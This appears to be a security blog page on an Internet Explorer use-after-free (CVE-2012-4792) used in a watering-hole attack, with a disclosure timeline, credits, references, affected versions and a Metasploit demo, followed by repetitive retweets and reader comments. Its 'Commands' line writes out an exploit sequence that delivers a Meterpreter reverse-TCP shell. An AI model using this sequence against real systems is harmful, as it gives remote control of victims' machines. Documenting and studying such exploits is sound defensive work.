Timeline :
CVE reference assigned the 2012-09-06
First samples of the attack discovered in Google cache the 2012-12-07
Vulnerability discovered exploited in the wild on CFE.org around the 2012-12-26
Vulnerability details provided by binjo, Eric Romang and FireEye the 2012-12-29
Microsoft Security Advisory published the 2012-12-30
Metasploit PoC provided the 2012-12-30
Metasploit module name changed the 2012-12-31
PoC provided by :
eromang
mahmud ab rahman
sinn3r
binjo
juan vazquez
Reference(s) :
CVE-2012-4792
MSA-2794220
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability
Attack and IE 0day Informations Used Against Council on Foreign Relations
CFR WATERING HOLE ATTACK DETAILS
Affected version(s) :
nternet Explorer 6
Internet Explorer 7
Internet Explorer 8
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
Note: The module name has change from ie_cdwnbindinfo_uaf to ie_cbutton_uaf
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.
Commands :
use exploit/windows/browser/ie_cbutton_uaf set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sysinfo getuid
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
@eromang anyone tried this on XBOX / windows phone?
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
RT @eromang: #Microsoft Internet Explorer CDwnBindInfo Vulnerability #Metasploit Demo http://t.co/YAVyMi8L #infosec #CFR #0day
Can you provide me download link of affected internet explorer version on my email id plz